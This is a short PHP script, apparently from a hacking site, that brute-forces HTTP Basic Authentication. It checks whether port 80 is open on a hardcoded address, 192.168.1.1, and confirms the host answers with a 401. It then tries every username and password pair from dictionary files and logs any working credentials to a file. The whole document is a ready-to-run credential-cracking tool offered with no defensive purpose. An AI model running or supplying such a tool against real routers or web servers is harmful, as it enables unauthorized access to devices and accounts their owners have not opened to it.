<?php
//Author:ClsHack.it
//Site:www.clshack.it :D
set_time_limit (0);
define("DICTIONARY_PASSWORD","/home/clshack/pass.txt");
define("DICTIONARY_USERS","/home/clshack/users.txt");
define ("RESULT","result.log");
define ("PORT",80);
define ("TIMEOUT",0.6);
//output
function write($string)
{
$fh = fopen(RESULT, 'a') or die("Can't open file:".RESULT."\n\nControl file permission.");
fwrite($fh, $string."\n");
fclose($fh);
}
//port is open ? o.O
function unreadable($ip)
{
$fp=@fsockopen($ip, PORT, $errno, $errstr, TIMEOUT);
//response ?
if($fp)
return 1;
//port close...
return 0;
}
//is http basic authentication ? o.O
function http_basic($ip)
{
$ip="http://".$ip;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$ip);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_NOBODY, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, TIMEOUT);
curl_exec($ch);
$info = curl_getinfo($ch);
curl_close ($ch);
if($info["http_code"]=="401")
return 1;
else if($info["http_code"]=="200")
{
echo "$ip Return code 200\n";
write("$ip Return code 200\n");
return 0;
}
else
return 0;
}
function authentication($ip,$user,$password)
{
$ip="http://".$ip;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$ip);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_NOBODY, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch,CURLOPT_USERPWD, "$user:$password");
curl_setopt($ch, CURLOPT_TIMEOUT, TIMEOUT);
curl_exec($ch);
$info =curl_getinfo($ch);
curl_close ($ch);
if($info["http_code"]=="200")
return 1;
else
return 0;
}
function crack($ip)
{
$esci=1;
$users_file = @fopen(DICTIONARY_USERS, "r");
if ($users_file)
{
while (!feof($users_file) && $esci)
{
$user = fgets($users_file);
$user=str_replace("\r","",$user);
$user=str_replace("\n","",$user);
$password_file = @fopen(DICTIONARY_PASSWORD, "r");
if ($password_file)
{
while (!feof($password_file))
{
$password = fgets($password_file);
$password=str_replace("\r","",$password);
$password=str_replace("\n","",$password);
//echo "->$user:$password, ip:$ip\n";
if(authentication($ip,$user,$password))
{
echo "Password found ->$user:$password, ip:$ip\n";
write("Password found ->$user:$password, ip:$ip\n");
$esci=0;
break;
}
}
fclose($password_file);
}
else
die("Can't open dictionary.\n");
}
}
else
die("Can't open dictionary.\n");
fclose($users_file);
}
$ip="192.168.1.1";
if(unreadable($ip))
{
if(http_basic($ip))
{
echo "$ip\n";
crack($ip);
}
}
?>